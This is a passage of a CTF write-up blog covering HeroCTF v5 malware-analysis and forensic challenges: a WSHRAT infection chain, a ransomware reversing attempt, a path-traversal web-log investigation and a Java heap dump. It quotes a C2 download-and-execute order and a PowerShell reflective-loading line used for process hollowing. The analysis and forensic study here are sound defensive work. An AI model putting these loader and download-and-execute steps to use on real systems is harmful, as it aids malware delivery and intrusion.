6z\"></path></svg></a>Task1</h3>\n<blockquote>\n<p>On 2023-04-29 10:10:07, we received the following order from a C2 server located on the domain {C2 URL}:</p>\n<p>{C2 URL}</p>\n<p>Warning : This series of challenges contains real world malware. Do not execute it on your host, use a VM !!</p>\n<p>The flag corresponds to malware family that sends this order, e.g. Hero{QAKBOT}.</p>\n<p>Format : Hero{malware-family}\nAuthor : xanhacks</p>\n</blockquote>\n<p>This challenge asked for the malware family that issues commands from C2 such as <code class=\"language-text\">down-n-exec|https://&lt;malware distribution server>/qk7kvg.VBS|qk7kvg.VBS</code>.</p>\n<p>I first thought it was STRRAT, but that was not correct, so I dug a little deeper and found the following article.</p>\n<p>Reference: <a href=\"https://www.uptycs.com/blog/wshrat-acting-as-a-dropper-for-agent-tesla\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Agent Tesla Malware Analysis: WSHRAT Acting as a Dropper</a></p>\n<p>That led me to the correct flag, <code class=\"language-text\">Hero{WSHRAT}</code>.</p>\n<h3 id=\"task2\" style=\"position:relative;\"><a href=\"#task2\" aria-label=\"task2 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Task2</h3>\n<blockquote>\n<p>A script named qk7kvg.VBS appears to have been executed on the victim’s machine. Find the next step in the infection chain!</p>\n<p>Warning : This series of challenges contains real world malware. Do not execute it on your host, use a VM !!</p>\n<p>The flag corresponds to the URL and the Windows path of the downloaded file, e.g. Hero{<a href=\"https://dropbox.com/file/xyz%7CC:%5CWindows%5CTemp%5Cmalware.exe%7D\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">https://dropbox.com/file/xyz|C:\\Windows\\Temp\\malware.exe}</a>.</p>\n<p>Format : Hero{URL|FULL_PATH}\nAuthor : xanhacks</p>\n</blockquote>\n<p>In this task, the flag was the URL of the server distributing the second-stage sample referenced in the sample <code class=\"language-text\">qk7kvg.VBS</code> retrieved from C2.</p>\n<p>The URL was written in plaintext in the sample.</p>\n<h3 id=\"task3\" style=\"position:relative;\"><a href=\"#task3\" aria-label=\"task3 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Task3</h3>\n<blockquote>\n<p>A powershell script named vidyud.jpg appears to have been executed on the victim’s machine. Find the next step in the infection chain! How the first binary runs the second one?</p>\n<p>Warning : This series of challenges contains real world malware. Do not execute it on your host, use a VM !!</p>\n<p>The flag corresponds to the name of technique and the method name for hiding the malicious process, e.g. Hero{DLL Injection|mainMethod}.</p>\n<p>Format : Hero{Technique|Method name}\nAuthor : xanhacks</p>\n</blockquote>\n<p>Analyzing the second-stage sample downloaded by <code class=\"language-text\">qk7kvg.VBS</code>, I found that although it had a <code class=\"language-text\">.png</code> extension, the file actually contained an obfuscated PowerShell script.</p>\n<p>This script generates two binary files from obfuscated byte data.</p>\n<p>After deobfuscating it and saving the byte data as files, I was able to obtain the following two samples.</p>\n<p>Reference: <a href=\"https://www.virustotal.com/gui/file/d0043009211a1d48c601ad011eec26bfb01d56331fe2509a7422d2ed984089bf/detection\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">VirusTotal - File - d0043009211a1d48c601ad011eec26bfb01d56331fe2509a7422d2ed984089bf</a></p>\n<p>Reference: <a href=\"https://www.virustotal.com/gui/file/ecae6a842a9d1e85254965536628840d2dd28145db57e32d821b10ec9744ba8f/detection\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">VirusTotal - File - ecae6a842a9d1e85254965536628840d2dd28145db57e32d821b10ec9744ba8f</a></p>\n<p>Finally, it was run with the following command, loading sample A and passing the data from sample B to a function in it.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token punctuation\">[</span>Reflection.Assembly<span class=\"token punctuation\">]</span>::Load<span class=\"token punctuation\">(</span><span class=\"token variable\">$uiououououououououoououo</span><span class=\"token punctuation\">)</span>.GetType<span class=\"token punctuation\">(</span><span class=\"token string\">'Hhd95inlxpu7aiKwB3.Erc4ahc0TZJlqBWO9w'</span><span class=\"token punctuation\">)</span>.GetMethod<span class=\"token punctuation\">(</span><span class=\"token string\">'rdgUsOpw7'</span><span class=\"token punctuation\">)</span>.Invoke<span class=\"token punctuation\">(</span><span class=\"token variable\">$null</span>,<span class=\"token punctuation\">[</span>object<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">(</span><span class=\"token string\">'C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe'</span>,<span class=\"token variable\">$cbbzqwqwqqwqwwqw</span><span class=\"token punctuation\">))</span></code></pre></div>\n<p>Because it is loaded and executed with <code class=\"language-text\">[Reflection.Assembly]::Load</code>, we can tell that <code class=\"language-text\">$uiououououououououoououo</code>, which stores the data for sample A, was created in .NET.</p>\n<p>So I analyzed the extracted file with ILSpy, and by looking at the function <code class=\"language-text\">rdgUsOpw7</code> in the class <code class=\"language-text\">Hhd95inlxpu7aiKwB3.Erc4ahc0TZJlqBWO9w</code>, which is specified by the <code class=\"language-text\">GetType</code> method, I was able to understand its behavior.</p>\n<p>In the end, the correct flag was Process Hollowing, the technique used to inject the code, together with <code class=\"language-text\">g8tOGbvTY</code>, the function called by <code class=\"language-text\">rdgUsOpw7</code>.</p>\n<h3 id=\"task4\" style=\"position:relative;\"><a href=\"#task4\" aria-label=\"task4 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Task4</h3>\n<blockquote>\n<p>The second binary seems to be the real malware! Extract its configuration.</p>\n<p>Warning : This series of challenges contains real world malware. Do not execute it on your host, use a VM !!</p>\n<p>The flag corresponds to the C2 protocol, host and port, e.g. Hero{smb|sub.example.com|9932}.</p>\n<p>Format : Hero{protocol|domain|port}\nAuthor : xanhacks</p>\n</blockquote>\n<p>This challenge was to identify the communication destination and protocol used by the second sample.</p>\n<p>Here, I was able to determine the flag simply by using the VirusTotal analysis results as they were.</p>\n<p>Reference: <a href=\"https://www.virustotal.com/gui/file/ecae6a842a9d1e85254965536628840d2dd28145db57e32d821b10ec9744ba8f/behavior\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">VirusTotal - File - ecae6a842a9d1e85254965536628840d2dd28145db57e32d821b10ec9744ba8f</a></p>\n<h2 id=\"hero-ransomrev\" style=\"position:relative;\"><a href=\"#hero-ransomrev\" aria-label=\"hero ransomrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Hero Ransom(Rev)</h2>\n<blockquote>\n<p>The mission of analyzing this malware is given to you in order to recover an encrypted file.</p>\n<p>Do not run the malware on yout host machine.</p>\n<p>Format : Hero{flag}\nAuthors : SoEasY &#x26; Log_s</p>\n</blockquote>\n<p>You are given a ransomware sample with the following hash.</p>\n<p>Reference: <a href=\"https://www.virustotal.com/gui/file/fb0d5f066ee85b307b6bf83c8cf88699cac719c35637a4b74b2760c16bc805b9/detection\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">VirusTotal - File - fb0d5f066ee85b307b6bf83c8cf88699cac719c35637a4b74b2760c16bc805b9</a></p>\n<p>After looking through the <code class=\"language-text\">main</code> function decompiled in Ghidra, I focused on the following line.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/cf958d545176824409bbe4198b4e0993/11a8f/image-20230516182857634.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 11.666666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAkUlEQVQI1xXGyQqCYAAAYd//TTQtCi+d2twOYZF08BJEpCnq71aKppMxfDCSLGSUQketV8hijvZWmJUKi1ZD/apcgiuPwCP5bAiLPa/Snd4mbc5kjUfRuZMTWXek6mOk5U1nHTkcWodtZWA2O4zWxOoszNHGD32iICFKI+5PQRjniDwhEylZkVDWFcPQM44j/35Vr4+9Lq8ZogAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/cf958d545176824409bbe4198b4e0993/8ac56/image-20230516182857634.webp 240w,\n/static/cf958d545176824409bbe4198b4e0993/d3be9/image-20230516182857634.webp 480w,\n/static/cf958d545176824409bbe4198b4e0993/e46b2/image-20230516182857634.webp 960w,\n/static/cf958d545176824409bbe4198b4e0993/4cec6/image-20230516182857634.webp 1272w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/cf958d545176824409bbe4198b4e0993/8ff5a/image-20230516182857634.png 240w,\n/static/cf958d545176824409bbe4198b4e0993/e85cb/image-20230516182857634.png 480w,\n/static/cf958d545176824409bbe4198b4e0993/d9199/image-20230516182857634.png 960w,\n/static/cf958d545176824409bbe4198b4e0993/11a8f/image-20230516182857634.png 1272w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/cf958d545176824409bbe4198b4e0993/d9199/image-20230516182857634.png\"\n            alt=\"image-20230516182857634\"\n            title=\"image-20230516182857634\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It seemed to be calling an address stored in a register.</p>\n<p>When I set a breakpoint at this point in WinDbg and followed the execution, it allocated stack space and then called <code class=\"language-text\">0x2a7c4d28cec</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span> bp hero_ransom+0x1c04\n\n<span class=\"token operator\">></span> u @rcx L2\n000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d28238 4883ec28        sub     rsp,28h\n000002a7<span class=\"token variable\">`</span></span>c4d2823c e8ab0a0000      call    000002a7`c4d28cec</code></pre></div>\n<p>A function call beginning with <code class=\"language-text\">4883ec28</code> looks like the start of a PE entry function.</p>\n<p>When I printed this call destination as well, it looked like it was invoking code with something like a function prologue.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span> uf 000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d28cec\n000002a7<span class=\"token variable\">`</span></span>c4d28cec 48895c2420      mov     qword ptr <span class=\"token punctuation\">[</span>rsp+20h<span class=\"token punctuation\">]</span>,rbx\n000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d28cf1 <span class=\"token number\">55</span>              push    rbp\n000002a7<span class=\"token variable\">`</span></span>c4d28cf2 488bec          mov     rbp,rsp\n000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d28cf5 4883ec20        sub     rsp,20h\n000002a7<span class=\"token variable\">`</span></span>c4d28cf9 488b0510e50400  mov     rax,qword ptr <span class=\"token punctuation\">[</span>000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d77210<span class=\"token punctuation\">]</span>\n000002a7<span class=\"token variable\">`</span></span>c4d28d00 48bb32a2df2d992b0000 mov rbx,2B992DDFA232h\n000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d28d0a 483bc3          <span class=\"token function\">cmp</span>     rax,rbx\n000002a7<span class=\"token variable\">`</span></span>c4d28d0d <span class=\"token number\">7574</span>            jne     000002a7`c4d28d83  Branch\n<span class=\"token punctuation\">{</span><span class=\"token punctuation\">{</span> omitted <span class=\"token punctuation\">}</span><span class=\"token punctuation\">}</span></code></pre></div>\n<p>This function seems to have been decompressed from somewhere at runtime and expanded in memory, and it does not appear to be embedded in the original binary as raw bytes.</p>\n<p>After referring to the <a href=\"https://github.com/HeroCTF/HeroCTF_v5/tree/main/Reverse/HeroRansom\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Writeup</a>, I learned that a tool called HollowsHunter can be used to dump PE binaries expanded in memory like this.</p>\n<p>So I ran a memory scan with HollowsHunter, specifying the PID identified with the pseudo-register <code class=\"language-text\">$tpid</code>, and obtained a file named <code class=\"language-text\">2a7c4d00000.exe</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span> ? <span class=\"token variable\">$tpid</span>\nEvaluate expression: <span class=\"token number\">2288</span> <span class=\"token operator\">=</span> 00000000`000008f0\n\n<span class=\"token operator\">></span>hollows_hunter64.exe /pid <span class=\"token number\">2288</span>\nHollowsHunter v.0.3.6 <span class=\"token punctuation\">(</span>x64<span class=\"token punctuation\">)</span>\nBuilt on: May <span class=\"token number\">14</span> <span class=\"token number\">2023</span>\n\nusing: PE-sieve v.0.3.6.0\n\n<span class=\"token operator\">>></span> Scanning PID: <span class=\"token number\">2288</span> <span class=\"token builtin class-name\">:</span> hero_ransom.exe\n<span class=\"token operator\">>></span> Detected: <span class=\"token number\">2288</span>\n--------\nSUMMARY:\nScan at: 05/16/23 <span class=\"token number\">12</span>:31:13 <span class=\"token punctuation\">(</span><span class=\"token number\">1684240273</span><span class=\"token punctuation\">)</span>\nFinished scan in: <span class=\"token number\">141</span> milliseconds\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> Total scanned: <span class=\"token number\">1</span>\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> Total suspicious: <span class=\"token number\">1</span>\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> List of suspicious:\n<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span>: PID: <span class=\"token number\">2288</span>, Name: hero_ransom.exe</code></pre></div>\n<p>This matched the suspicious function-call code I had confirmed in the debugger.</p>\n<p>Next, I analyzed the dumped binary further with Ghidra.</p>\n<p>Looking at the <code class=\"language-text\">main</code> function, it was as follows.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">undefined8 <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  undefined local_28 <span class=\"token punctuation\">[</span><span class=\"token number\">16</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  undefined8 local_18<span class=\"token punctuation\">;</span>\n  undefined8 local_10<span class=\"token punctuation\">;</span>\n  \n  local_18 <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  local_10 <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  local_28 <span class=\"token operator\">=</span> <span class=\"token function\">ZEXT816</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">func1</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">undefined</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span><span class=\"token number\">32</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>local_28<span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span><span class=\"token function\">undefined</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span><span class=\"token number\">32</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token operator\">&amp;</span>DAT_140069a00<span class=\"token punctuation\">,</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">func2</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>longlong <span class=\"token operator\">*</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>local_28<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p><code class=\"language-text\">ZEXT816(0)</code> seems to zero-extend 8 bytes to 16 bytes. In other words, the original 8-byte zero becomes a 16-byte zero and is stored in <code class=\"language-text\">local_28</code>.</p>\n<p>Also, <code class=\"language-text\">DAT_140069a00</code> contains a single <code class=\"language-text\">.</code> character.</p>\n<p>The official Writeup identifies the logic very quickly with static analysis, but honestly I felt it was extremely difficult to analyze on my own.</p>\n<p>First, <code class=\"language-text\">local_28</code> is given together with <code class=\"language-text\">.</code> to <code class=\"language-text\">func1</code>, and after that <code class=\"language-text\">local_28</code> is passed to <code class=\"language-text\">func2</code>.</p>\n<p>I had no idea where the actual encryption was being performed, so for the moment I tried running the malware under Noriben.</p>\n<p>It seemed that this malware encrypts files under the folder where the malware is executed.</p>\n<p>That suggests that <code class=\"language-text\">func1</code>, which receives <code class=\"language-text\">.</code>, is probably traversing the current directory.</p>\n<p>From here, I followed the processing with WinDbg.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span> bp Hero+0x571f</code></pre></div>\n<p>I first set a breakpoint on the <code class=\"language-text\">main</code> function and traced the execution, but by the time <code class=\"language-text\">func1</code> finished, no file encryption had occurred.</p>\n<p>In other words, the encryption routine seems to be on the <code class=\"language-text\">func2</code> side.</p>\n<p>Static analysis gave me no clue where the encryption processing was taking place, so I decided to inspect the arguments at each function call with WinDbg.</p>\n<p>However, <code class=\"language-text\">func2</code> makes a huge number of function calls, so I first wrote all function-call arguments to a file with the following command.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span> .logopen /t C:<span class=\"token punctuation\">\\</span>Users<span class=\"token punctuation\">\\</span>Public<span class=\"token punctuation\">\\</span>windbg.log\n<span class=\"token operator\">></span> .while <span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span> pc<span class=\"token punctuation\">;</span>.echo rcd<span class=\"token punctuation\">;</span><span class=\"token function\">dc</span> @rcx L10<span class=\"token punctuation\">;</span>.echo rdx<span class=\"token punctuation\">;</span> <span class=\"token function\">dc</span> @rdx L10<span class=\"token punctuation\">;</span>.echo r8<span class=\"token punctuation\">;</span> <span class=\"token function\">dc</span> @r8 L10<span class=\"token punctuation\">;</span>.echo r9<span class=\"token punctuation\">;</span> <span class=\"token function\">dc</span> @r9 L10<span class=\"token punctuation\">;</span>.echo stack<span class=\"token punctuation\">;</span> <span class=\"token function\">dc</span> @rsp L10<span class=\"token punctuation\">;</span>.echo rip<span class=\"token punctuation\">;</span> u rip L1 <span class=\"token punctuation\">}</span></code></pre></div>\n<p>This let me dump the arguments at each function call inside <code class=\"language-text\">func2</code>, so I looked through them for a function whose arguments included <code class=\"language-text\">test.txt</code>, which I had placed in the same folder as the malware.</p>\n<p>However, even after staring at Ghidra for about four hours while reading the Writeup, I unfortunately still could not determine exactly where the encryption processing was happening.</p>\n<p>I want to read <a href=\"https://github.com/HeroCTF/HeroCTF_v5/tree/main/Reverse/HeroRansom\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">the official writeup</a> and retry it another day.</p>\n<h2 id=\"devcorpforensic\" style=\"position:relative;\"><a href=\"#devcorpforensic\" aria-label=\"devcorpforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>dev.corp(Forensic)</h2>\n<h3 id=\"task1-1\" style=\"position:relative;\"><a href=\"#task1-1\" aria-label=\"task1 1 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Task1</h3>\n<blockquote>\n<p>The famous company dev.corp was hack last week.. They don’t understand because they have followed the security standards to avoid this kind of situation. You are mandated to help them understand the attack.</p>\n<p>For this first step, you’re given the logs of the webserver of the company.</p>\n<p>Could you find :</p>\n<ul>\n<li>The CVE used by the attacker ?</li>\n<li>What is the absolute path of the most sensitive file recovered by the attacker ?</li>\n</ul>\n<p>Format : Hero{CVE-XXXX-XXXX:/etc/passwd}\nAuthor : Worty</p>\n<p>Here is a diagram representing the company’s infrastructure:</p>\n</blockquote>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 811px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9ad941ead9bfad3f15eeb091928e4fbf/fd28b/infra.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 65.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAA5UlEQVQoz5WS2RaCMAxE+f8/ZTktSwGxtHrtuGBFj8xDCZlMJl2KeZ699+cEBazLsjRNU1VVWZZ932cFgAKEBZ/LccQYp2l6iUMI6reuK71PCSRZlVQGSuI3Z2jnXGtbZoMwxvBLsus6Yy1dhmGwtoXaEcuEYeQMJ2cCJTXCvvPRPf8lpm5NIMjFz6vyH2BOraNzXBiBdiTcxHymBIitkjxHdRePI6fFjNSomBiq4EhkyyS6KuJs8u3Ysg0JBVm1gcOqrmusfhyBnpfa3cW6gG/O8YFcjDvVbEMPCEL3uQtR1KNEeAXwC/wU9+ONrgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9ad941ead9bfad3f15eeb091928e4fbf/8ac56/infra.webp 240w,\n/static/9ad941ead9bfad3f15eeb091928e4fbf/d3be9/infra.webp 480w,\n/static/9ad941ead9bfad3f15eeb091928e4fbf/a63ac/infra.webp 811w\"\n              sizes=\"(max-width: 811px) 100vw, 811px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9ad941ead9bfad3f15eeb091928e4fbf/8ff5a/infra.png 240w,\n/static/9ad941ead9bfad3f15eeb091928e4fbf/e85cb/infra.png 480w,\n/static/9ad941ead9bfad3f15eeb091928e4fbf/fd28b/infra.png 811w\"\n            sizes=\"(max-width: 811px) 100vw, 811px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9ad941ead9bfad3f15eeb091928e4fbf/fd28b/infra.png\"\n            alt=\"img\"\n            title=\"img\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This felt like a very practical forensic challenge.</p>\n<p>The challenge provided access logs for the web server.</p>\n<p>From these, I needed to identify the vulnerability abused in the attack and the most sensitive information among the stolen files.</p>\n<p>Since this was access-log analysis, I used the <code class=\"language-text\">cut</code> and <code class=\"language-text\">uniq</code> commands to look for suspicious paths and operations.</p>\n<p>As a result, I found access that looked like path traversal exploiting CVE-2020-11738, and I determined that the accessed <code class=\"language-text\">id_rsa_backup</code> was the most sensitive file.</p>\n<p>In the end, the flag was <code class=\"language-text\">Hero{CVE-2020-11738:/home/webuser/.ssh/id_rsa_backup}</code>.</p>\n<h2 id=\"heapforensic\" style=\"position:relative;\"><a href=\"#heapforensic\" aria-label=\"heapforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Heap(Forensic)</h2>\n<blockquote>\n<p>We caught a hacker red-handed while he was encrypting data. Unfortunately we were too late to see what he was trying to hide. We did however manage to get a dump of the java heap.</p>\n<p>Try to find the information he wants to hide from us.</p>\n<p>Format : Hero{}\nAuthor : Thib</p>\n</blockquote>\n<p>The provided challenge file was <code class=\"language-text\">heap.hprof</code>.</p>\n<p>Looking at it with Hexdump and similar tools, it seemed to be a dump of memory information from something like an Android app.</p>\n<p>The <code class=\"language-text\">.hprof</code> format is used for Java VM dump files, but apparently <code class=\"language-text\">.hprof</code> files dumped from Android Studio differ from the standard format, so they need to be converted once with <code class=\"language-text\">hprof-conv</code> before being loaded into MAT.</p>\n<p>Reference: <a href=\"https://stackoverflow.com/questions/185893/how-do-i-analyze-a-hprof-file\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">java - How do I analyze a .hprof file? - Stack Overflow</a></p>\n<p>Reference: <a href=\"https://qiita.com/cattaka/items/7e81a93aadc2bf616d54\" target=\"_blank\" 